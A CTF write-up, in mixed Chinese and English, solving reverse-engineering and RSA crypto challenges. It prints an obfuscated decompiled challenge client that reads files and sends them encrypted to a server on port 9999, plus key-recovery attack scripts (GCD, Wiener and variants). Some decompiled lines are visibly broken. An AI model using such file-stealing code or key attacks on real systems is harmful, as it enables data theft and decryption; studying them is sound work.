stage2_section.PointerToRawData : stage2_section.PointerToRawData + stage2_section.SizeOfRawData
]
if stage2_raw:
mu.mem_write(stage2_base + stage2_section.VirtualAddress, stage2_raw)
stack_base = 0x01000000
stack_size = 0x00100000
mu.mem_map(stack_base, stack_size)
stack_rsp = stack_base + stack_size - 0x4000
mu.mem_write(stack_rsp, struct.pack("<Q", 0xDEADBEEF)) # ret 2 0xDEADBEEF
scratch_base = 0x02000000
mu.mem_map(scratch_base, 0x00020000)
mydata_section = next(section for section in stage2_dec_pe.sections if section.Name.rstrip(b"\0") == b".mydata")
data = stage2_dec[
mydata_section.PointerToRawData : mydata_section.PointerToRawData + mydata_section.SizeOfRawData
]
aes_key = data[1:33]
aes_iv = data[33:49]
ciphertext = data[49:97]
plaintext_out = scratch_base + 0x5000
mu.mem_write(scratch_base + 0x1000, ciphertext)
mu.mem_write(scratch_base + 0x2000, aes_key)
mu.mem_write(scratch_base + 0x3000, aes_iv)
mu.mem_write(stack_rsp + 0x28, struct.pack("<Q", plaintext_out))
mu.reg_write(UC_X86_REG_RSP, stack_rsp)
mu.reg_write(UC_X86_REG_RCX, scratch_base + 0x1000)
mu.reg_write(UC_X86_REG_RDX, len(ciphertext))
mu.reg_write(UC_X86_REG_R8, scratch_base + 0x2000)
mu.reg_write(UC_X86_REG_R9, scratch_base + 0x3000)
mu.emu_start(0x404d80, 0xDEADBEEF) # run to 0xDEADBEEF
plaintext = bytes(mu.mem_read(plaintext_out, len(ciphertext)))
print(plaintext.decode()) re3
pyinstaller,直接拆。拆出来pyc丢给pylingual。
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'client.py'
# Bytecode version: 3.10.b1 (3439)
# Source timestamp: 1970-01-01 00:00:00 UTC (0)
import base64
import sys
import os
import json
import socket
import hashlib
import crypt_core
import builtins
def _oe(_d, _k1, _k2, _rn):
# ***<module>._oe: Failure: Compilation Error
try:
_b = base64.b85decode(_d.encode())
_r = []
for _i, _x in enumerate(_b):
return ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn),
_r.append(_x, _k if _k else None)
_s = bytes(_r).decode()
_res = []
for _c in _s:
if _c.isalpha():
_base = ord('A') if _c.isupper() else ord('a')
_res.append((chr, ord(_c), _base, _rn, 26, _base))
else:
if _c.isdigit():
_res.append(str(int(_c), _rn or 10))
else:
_res.append(_c)
return ''.join(_res)
except:
return _d
_globs = dict(__name__='__main__', __file__=__file__, __package__=None, _oe=_oe)
for _k in dir(builtins):
if not _k.startswith('_'):
_globs[_k] = getattr(builtins, _k)
_globs['base64'] = base64
_globs['sys'] = sys
_globs['os'] = os
_globs['json'] = json
_globs['socket'] = socket
_globs['hashlib'] = hashlib
_globs['crypt_core'] = crypt_core
def _obf_check():
if hasattr(sys, 'gettrace'):
_tr = sys.gettrace()
if _tr is not None:
return False
return True
def _obf_exec(_code):
# ***<module>._obf_exec: Failure: Different bytecode
if not _obf_check():
return None
else:
exec(compile, _code, chr(60) | chr(111) | chr(98) | chr(102) | chr(101) | chr(120) | chr(99))
_1667 = 'xxxxx'
_obf_exec(base64.b85decode(_1667).decode()) 再拆
_j0 = lambda: (30 ^ 126) + (520 % 26)
_j1 = lambda: (158 ^ 184) + (820 % 54)
_j2 = lambda: (37 ^ 2) + (687 % 25)
_j3 = lambda: (72 ^ 112) + (474 % 30)
_j4 = lambda: (173 ^ 82) + (257 % 73)
_j5 = lambda: (117 ^ 203) + (331 % 54)
_j6 = lambda: (242 ^ 46) + (846 % 33)
_j7 = lambda: (21 ^ 148) + (425 % 77)
_j8 = lambda: (139 ^ 134) + (427 % 21)
_j9 = lambda: (245 ^ 62) + (413 % 85)
_j10 = lambda: (242 ^ 65) + (892 % 30)
_j11 = lambda: (22 ^ 58) + (740 % 59)
_j12 = lambda: (139 ^ 248) + (771 % 74)
_j13 = lambda: (219 ^ 230) + (262 % 63)
_j14 = lambda: (17 ^ 89) + (622 % 38)
_j15 = lambda: (229 ^ 205) + (369 % 25)
_j16 = lambda: (111 ^ 33) + (433 % 50)
_j17 = lambda: (41 ^ 142) + (512 % 21)
class _Obf3776:
def __init__(self):
self._v = 751
def _m(self):
return self._v * 5
#!/usr/bin/env python3
import socket
import json
import os
import sys
import hashlib
import time
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import crypt_core
class CustomBase64:
CUSTOM_ALPHABET = _oe("8<<BLok1UrR}_R>27yTmms1djUI&{(7Ls{Apm;c@eJQYZA-rTHu4po}aw559KBaUw?kHpDBVghrW#KRr", 83, 214, 17)
STANDARD_ALPHABET = (
_oe("0fj{dfJO_COA?e)7n4^Mo>&>3T^^WT1BYWEqGTnZX)3I6F|~Czuy#AYdpNp$J-J~b;VEk7AYtVtX5cz}", 83, 214, 17)
)
ENCODE_TABLE = str.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)
DECODE_TABLE = str.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
@classmethod
def decode(cls, data: str) -> bytes:
import base64
std_b64 = data.translate(cls.DECODE_TABLE)
return base64.b64decode(std_b64)
SERVER_HOST = ""
SERVER_PORT = 9999
KEY_B64 = _oe("C7MAupdc5tRBM!52kv4Wmp~Hle`A4N5`t?5nObY+L~6Pz5wdF*y=E$zQv!xZ", 83, 214, 17)
KEY = CustomBase64.decode(KEY_B64)
FILES_TO_SEND = [_oe("I-p}FvS)q0emD", 83, 214, 17), _oe("B(-BJ_<B6O", 83, 214, 17), _oe("C$MxRtZ99{emD", 83, 214, 17)]
def _opaque_true():
_x = 0
for _i in range(100):
_x += _i * (_i - _i + 1)
return _x >= 0
def _opaque_false():
_a, _b = 5, 7
return (_a * _b) == (_b * _a + 1)
def _dead_calc():
_dead = 0
for _i in range(50):
_dead = (_dead + _i) % 17
if _dead > 100:
_dead = _dead * 2 + 1
return _dead
def encrypt_file(key: bytes, plaintext: bytes) -> bytes:
_state = 0
_result = None
while _state < 3:
if _state == 0:
if _opaque_true():
_result = crypt_core.encode_data(plaintext, key[:16])
_state = 2
else:
_dead_calc()
_state = 1
elif _state == 1:
_dead_calc()
_state = 2
elif _state == 2:
if _opaque_false():
_result = None
_state = 3
return _result
def send_single_file(sock, filename, plaintext):
_s = 0
_ct = None
_pl = None
while _s < 5:
if _s == 0:
_ct = encrypt_file(KEY, plaintext)
_s = 1
elif _s == 1:
_pl = {_oe("B&>2Jvtu`)", 83, 214, 17): filename, _oe("C#-fVpm;c-emD", 83, 214, 17): _ct.hex()}
_s = 2
elif _s == 2:
if _opaque_true():
sock.sendall(json.dumps(_pl).encode(_oe("KfPvt;{", 83, 214, 17)) + b"\n")
_s = 4
else:
_dead_calc()
_s = 3
elif _s == 3:
_dead_calc()
_s = 4
elif _s == 4:
if not _opaque_false():
time.sleep(0.1)
_s = 5
def _verify_cmd(cmd):
_state = 10
_hash_val = None
_valid = False
while _state < 50:
if _state == 10:
if len(cmd) > 0:
_state = 20
else:
_state = 49
elif _state == 20:
_hash_val = hashlib.md5(cmd.encode()).hexdigest()
_state = 30
elif _state == 30:
if _opaque_true():
_valid = _hash_val == _oe("VWK4=qGuqYBxK?sVWlBw<RW0^B4q9&VB;re<0L2U", 83, 214, 17)
_state = 40
else:
_dead_calc()
_state = 49
elif _state == 40:
if _valid:
_state = 50
else:
_state = 49
elif _state == 49:
return False
return _valid
def _get_server_host(args):
_s = 100
_host = None
while _s < 200:
if _s == 100:
if len(args) > 2:
_s = 110
else:
_s = 120
elif _s == 110:
_host = args[2]
_s = 200
elif _s == 120:
if _opaque_true():
_host = ""
_s = 200
elif _s == 200:
if _opaque_false():
_host = _oe("Ywsm};Xh>fDF", 83, 214, 17)
_s = 201
return _host
def main():
_state = 0
_sock = None
_idx = 0
_printed_header = False
while _state < 100:
if _state == 0:
if _opaque_false():
print(_oe("2B2dm_GLArX8", 83, 214, 17))
_state = 1
elif _state == 1:
if len(sys.argv) < 2:
_state = 5
else:
_state = 2
elif _state == 2:
if _verify_cmd(sys.argv[1]):
_state = 3
else:
_state = 4
elif _state == 3:
if not _printed_header:
print("=" * 50)
print(_oe("8K7l9zh`rSYcQZO7{6mSyk;f8F$cA4C9`^SyD5F)", 83, 214, 17))
print("=" * 50)
_printed_header = True
_state = 10
elif _state == 4:
print("错误:无效的命令")
_state = 99
elif _state == 5:
print("用法:python client.py <command> [SERVER_HOST]")
_state = 99
elif _state == 10:
try:
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_state = 11
except Exception:
_state = 99
elif _state == 11:
_host = _get_server_host(sys.argv)
_state = 12
elif _state == 12:
try:
_sock.connect((_host, SERVER_PORT))
_state = 20
except Exception as e:
print(f"[!] 连接失败:{e}")
_state = 99
elif _state == 20:
if _idx < len(FILES_TO_SEND):
_state = 21
else:
_state = 30
elif _state == 21:
_fname = FILES_TO_SEND[_idx]
_state = 22
elif _state == 22:
if os.path.exists(_fname):
_state = 23
else:
_state = 28
elif _state == 23:
with open(_fname, "rb") as _f:
_data = _f.read()
_state = 24
elif _state == 24:
if _opaque_true():
print(f"[*] 发送文件")
_state = 25
elif _state == 25:
if not _opaque_false():
send_single_file(_sock, _fname, _data)
_state = 26
elif _state == 26:
_idx += 1
_state = 20
elif _state == 28:
print(f"[-] 文件不存在")
_state = 29
elif _state == 29:
_idx += 1
_state = 20
elif _state == 30:
if _opaque_true():
time.sleep(0.2)
_state = 31
elif _state == 31:
if _sock:
_sock.close()
_state = 99
elif _state == 99:
break
if __name__ == _oe("42g9itaJ>C", 83, 214, 17):
_dead_calc()
if _opaque_true():
main()
else:
_dead_calc()
主要问题是crypt_core.so。暴露出来只有个encode_data的接口。
拖进ida看眼,搜索发现似乎看起来是魔改sm4。然后表是后面初始化的,在0xDB80,0x
DB00,0xDBA0。
可以读到:
import ctypes
import sys
class PyMethodDef(ctypes.Structure):
_fields_ = [
("ml_name", ctypes.c_void_p),
("ml_meth", ctypes.c_void_p),
("ml_flags", ctypes.c_int),
("ml_doc", ctypes.c_void_p),
]
class CyFuncObject(ctypes.Structure):
_fields_ = [
("ob_refcnt", ctypes.c_ssize_t),
("ob_type", ctypes.c_void_p),
("m_ml", ctypes.POINTER(PyMethodDef)),
("m_self", ctypes.c_void_p),
("m_module", ctypes.c_void_p),
("vectorcall", ctypes.c_void_p),
("mm_class", ctypes.c_void_p),
]
sys.path.insert(0, "/Users/libr/Desktop/CTF/1/pyi_extract")
import crypt_core
obj = CyFuncObject.from_address(id(crypt_core.encode_data))
entry = obj.m_ml.contents.ml_meth
base = entry - 0x9820
db80 = ctypes.string_at(base + 0xDB80, 16)
db00 = ctypes.string_at(base + 0xDB00, 128)
dba0 = ctypes.string_at(base + 0xDBA0, 256)
然后再写个反向操作
KEY = b"passvkcDKWLAA45o"
def rotl32(value, shift):
return ((value << shift) | (value >> (32 - shift))) & 0xFFFFFFFF
def tau(value):
return (
DBA0[(value >> 24) & 0xFF] << 24
| DBA0[(value >> 16) & 0xFF] << 16
| DBA0[(value >> 8) & 0xFF] << 8
| DBA0[value & 0xFF]
)
def l_transform(value):
return value ^ rotl32(value, 2) ^ rotl32(value, 10) ^ rotl32(value, 18) ^ rotl32(value, 24)
def l_prime_transform(value):
return value ^ rotl32(value, 13) ^ rotl32(value, 23)
def chunk_words(data, endian):
out = []
for offset in range(0, len(data), 4):
part = data[offset : offset + 4]
out.append(int.from_bytes(part, endian))
return out
def pad_pkcs7(data):
pad = 16 - (len(data) % 16)
if pad == 0:
pad = 16
return data + bytes([pad]) * pad
def unpad_pkcs7(data):
if not data:
raise ValueError("empty data")
pad = data[-1]
if pad < 1 or pad > 16:
raise ValueError("bad padding length")
if data[-pad:] != bytes([pad]) * pad:
raise ValueError("bad padding bytes")
return data[:-pad]
def expand_round_keys(key, fk_endian, ck_endian):
mk = chunk_words(key, "big")
fk = chunk_words(DB80, fk_endian)
ck = chunk_words(DB00, ck_endian)
state = [mk[i] ^ fk[i] for i in range(4)]
rks = []
for index in range(24):
value = state[index + 1] ^ state[index + 2] ^ state[index + 3] ^ ck[index]
value = l_prime_transform(tau(value))
rk = state[index] ^ value
state.append(rk)
rks.append(rk)
return rks
def encrypt_block(block, rks, block_endian):
x = chunk_words(block, block_endian)
for rk in rks:
value = x[-3] ^ x[-2] ^ x[-1] ^ rk
x.append(x[-4] ^ l_transform(tau(value)))
out = x[-1], x[-2], x[-3], x[-4]
return b"".join(word.to_bytes(4, block_endian) for word in out)
def decrypt_block(block, rks, block_endian):
return encrypt_block(block, list(reversed(rks)), block_endian)
def encrypt_ecb(data, rks, block_endian):
padded = pad_pkcs7(data)
out = bytearray()
for offset in range(0, len(padded), 16):
out.extend(encrypt_block(padded[offset : offset + 16], rks, block_endian))
return bytes(out)
def decrypt_ecb(data, rks, block_endian):
if len(data) % 16 != 0:
raise ValueError("ciphertext is not block aligned")
out = bytearray()
for offset in range(0, len(data), 16):
out.extend(decrypt_block(data[offset : offset + 16], rks, block_endian))
return unpad_pkcs7(bytes(out))
最后
import json
with open("./1.json", "r", encoding="utf-8") as handle:
packets = json.load(handle)
KEY = b"passvkcDKWLAA45o"
rks = expand_round_keys(KEY, "little", "little")
for p in packets:
layers = p["_source"]["layers"]
if "data" not in layers:
continue
payload_hex = layers["data"]["data.data"].replace(":", "")
payload = bytes.fromhex(payload_hex)
row = json.loads(payload)
print(row)
ciphertext = bytes.fromhex(row["ciphertext"])
plaintext = decrypt_ecb(ciphertext, rks, "big")
print(plaintext.decode("utf-8", errors="replace"))
crypto
rsa
level1
given 20 pem and we can just brute force and find (1,2),(4,15) share the same factor,
and key 6,12,17 can be factored with wiener (small d)
then just crt recover.
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Util.number import long_to_bytes
from math import gcd, isqrt
from pathlib import Path
def wiener_attack(n, e):
def continued_fraction(num, den):
frac = []
while den:
a = num // den
frac.append(a)
num, den = den, num - a * den
return frac
def convergents(frac):
n0, d0 = frac[0], 1
yield n0, d0
if len(frac) == 1:
return
n1, d1 = frac[0] * frac[1] + 1, frac[1]
yield n1, d1
for a in frac[2:]:
n0, n1 = n1, a * n1 + n0
d0, d1 = d1, a * d1 + d0
yield n1, d1
frac = continued_fraction(e, n)
for k, d in convergents(frac):
if k == 0 or (e * d - 1) % k:
continue
phi = (e * d - 1) // k
s = n - phi + 1
disc = s * s - 4 * n
if disc >= 0:
t = isqrt(disc)
if t * t == disc:
p = (s + t) // 2
q = (s - t) // 2
if p * q == n:
return d, p, q
return None
def build_private_keys(base):
keys_pub = {}
for p in Path(base).glob('key-*.pem'):
idx = int(p.stem.split('-')[1])
keys_pub[idx] = RSA.import_key(p.read_bytes())
priv = {}
# Keys 1 and 2 share a factor
n1, n2 = keys_pub[1].n, keys_pub[2].n
g = gcd(n1, n2)
for idx, n in [(1, n1), (2, n2)]:
p, q = g, n // g
phi = (p - 1) * (q - 1)
d = pow(keys_pub[idx].e, -1, phi)
priv[idx] = RSA.construct((n, keys_pub[idx].e, d, p, q))
# Keys 4 and 15 share a factor
n4, n15 = keys_pub[4].n, keys_pub[15].n
g = gcd(n4, n15)
for idx, n in [(4, n4), (15, n15)]:
p, q = g, n // g
phi = (p - 1) * (q - 1)
d = pow(keys_pub[idx].e, -1, phi)
priv[idx] = RSA.construct((n, keys_pub[idx].e, d, p, q))
# Wiener attack on keys 6, 12, 17
for idx in [6, 12, 17]:
result = wiener_attack(keys_pub[idx].n, keys_pub[idx].e)
if result:
d, p, q = result
priv[idx] = RSA.construct((keys_pub[idx].n, keys_pub[idx].e, d, p, q))
return keys_pub, priv
def decrypt_ciphertext(priv, pub, ciphertext):
nbits = pub.n.bit_length()
key_len = (nbits + 7) // 8
if len(ciphertext) < key_len + 28:
return None
header = ciphertext[:key_len]
nonce = ciphertext[key_len:key_len + 12]
body = ciphertext[key_len + 12:-16]
tag = ciphertext[-16:]
try:
if nbits >= 2048:
# OAEP for larger keys
sk = PKCS1_OAEP.new(priv).decrypt(header)
else:
# Raw RSA for smaller keys
m = pow(int.from_bytes(header, 'big'), priv.d, priv.n)
sk = long_to_bytes(m).rjust(16, b'\x00')
cipher = AES.new(sk, AES.MODE_GCM, nonce=nonce)
pt = cipher.decrypt_and_verify(body, tag)
return pt
except Exception:
return None
def crt(residues, moduli):
x = 0
M = 1
for a, m in zip(residues, moduli):
t = ((a - x) % m) * pow(M, -1, m) % m
x += M * t
M *= m
return x, M
base = "./level1"
print("[*] Building private keys...")
keys_pub, priv = build_private_keys(base)
cts = {}
for p in Path(base).glob('ciphertext-*.bin'):
idx = int(p.stem.split('-')[1])
cts[idx] = p.read_bytes()
print("[*] Decrypting ciphertexts...")
working_pairs = []
for kidx in sorted(priv):
for cidx, ct in sorted(cts.items()):
pt = decrypt_ciphertext(priv[kidx], keys_pub[kidx], ct)
if pt is not None:
working_pairs.append((cidx, kidx, priv[kidx]))
print(f" Key {kidx} decrypts ciphertext {cidx}")
plaintexts = {}
for cidx, kidx, priv_key in working_pairs:
ct = cts[cidx]
pt = decrypt_ciphertext(priv_key, keys_pub[kidx], ct)
if pt:
lines = pt.decode().splitlines()[1:] # Skip header
plaintexts[cidx] = lines
for line_no in range(9):
residues = []
moduli = []
bits = None
for cidx in sorted(plaintexts):
d, k, b = [int(x, 16) for x in plaintexts[cidx][line_no].split(':')]
residues.append(k)
moduli.append(d)
bits = b
x, M = crt(residues, moduli)
blen = (bits + 7) // 8
if M.bit_length() > bits:
msg = x.to_bytes(blen, 'big')
print(f"{msg}") level2
uses ed = 1 \pmod {\frac{\phi(n)}{\gcd(p-1,q-1)} } instead of ed = 1 \pmod {\phi(n)}
so Enumerate small values of g = gcd(p-1, q-1) with continued fraction.
from math import isqrt
import hashlib
def continued_fraction(num, den):
frac = []
while den:
a = num // den
frac.append(a)
num, den = den, num - a * den
return frac
def convergents(frac):
n0, d0 = frac[0], 1
yield n0, d0
if len(frac) == 1:
return
n1, d1 = frac[0] * frac[1] + 1, frac[1]
yield n1, d1
for a in frac[2:]:
n0, n1 = n1, a * n1 + n0
d0, d1 = d1, a * d1 + d0
yield n1, d1
n = xxx
e = xxx
for g in range(2, 500, 2):
frac = continued_fraction(g * e, n)
for t, d in convergents(frac):
if t == 0:
continue
num = e * d - 1
if (num * g) % t:
continue
phi = (num * g) // t
s = n - phi + 1
disc = s * s - 4 * n
if disc < 0:
continue
sq = isqrt(disc)
if sq * sq != disc:
continue
# Recover p and q
p = (s + sq) // 2
q = (s - sq) // 2
if p * q == n:
print(f"[+] success")
# Compute p + q
print(f"[*] {p + q = }")
# Compute password hash
password = hashlib.sha256(str(p + q).encode()).hexdigest()
print(f"[+] {password = }")
exit(0) level3
leak = ((p*A) ^ (q*B) ^ ((p&q)<<64) ^ ((p|q)<<48) ^ ((p^q)*C))
+ ((p+q) mod 2^128)
^ ((p*q) & MASK64) p*q mod 2^k depends on p mod 2^k and q mod 2^k, and lowbit(leak,k) also just depends on lowbit(p,k), lowbit(q,k). so we can just enumrate from the lowest bit
from Crypto.Util.number import long_to_bytes
n = xxx
e = 65537
c = xxx
leak = xxx
A = 0xDEADBEEFCAFEBABE123456789ABCDEFFEDCBA9876543210
B = 0xCAFEBABEDEADBEEF123456789ABCDEF0123456789ABCDEF
C = 0x123456789ABCDEFFEDCBA9876543210FEDCBA987654321
MASK64 = (1 << 64) - 1
MOD128 = (1 << 128) - 1
T = n & MASK64
Y = leak ^ T
def check_leak(p, q, k):
mod = 1 << k
X = ((p * A) ^ (q * B) ^ (((p & q) << 64) % mod) ^
(((p | q) << 48) % mod) ^ ((p ^ q) * C)) % mod
S = (p + q) & MOD128
return (X + S) % mod == Y % mod
states = [(1, 1)]
for k in range(1, 1536):
mod = 1 << (k + 1)
target_n = n % mod
target_y = Y % mod
new_states = []
for p, q in states:
for bp in (0, 1):
for bq in (0, 1):
pp = p | (bp << k)
qq = q | (bq << k)
if (pp * qq) % mod != target_n:
continue
if not check_leak(pp, qq, k + 1):
continue
new_states.append((pp, qq))
states = new_states
p, q = states[0]
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"{flag = }")